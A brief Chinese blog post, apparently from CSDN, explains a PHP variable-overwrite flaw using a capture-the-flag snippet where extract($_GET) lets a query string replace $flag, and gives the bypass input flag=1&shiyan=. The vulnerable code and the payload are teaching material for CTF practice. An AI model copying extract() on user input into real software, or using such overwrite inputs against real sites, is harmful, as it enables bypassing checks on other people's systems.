PHP变量覆盖漏洞

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/wangjian1012/article/details/51553284

$flag='xxx'; 

extract($_GET);

if(isset($shiyan))

     { $content=trim(file_get_contents($flag)); 

if($shiyan==$content)

     { echo'ctf{xxx}'; } else{ echo'Oh.no';} }构造flag=1&shiyan=

没有更多推荐了,返回首页

私密
私密原因:
请选择设置私密原因
  • 广告
  • 抄袭
  • 版权
  • 政治
  • 色情
  • 无意义
  • 其他
其他原因:
120
出错啦
系统繁忙,请稍后再试

关闭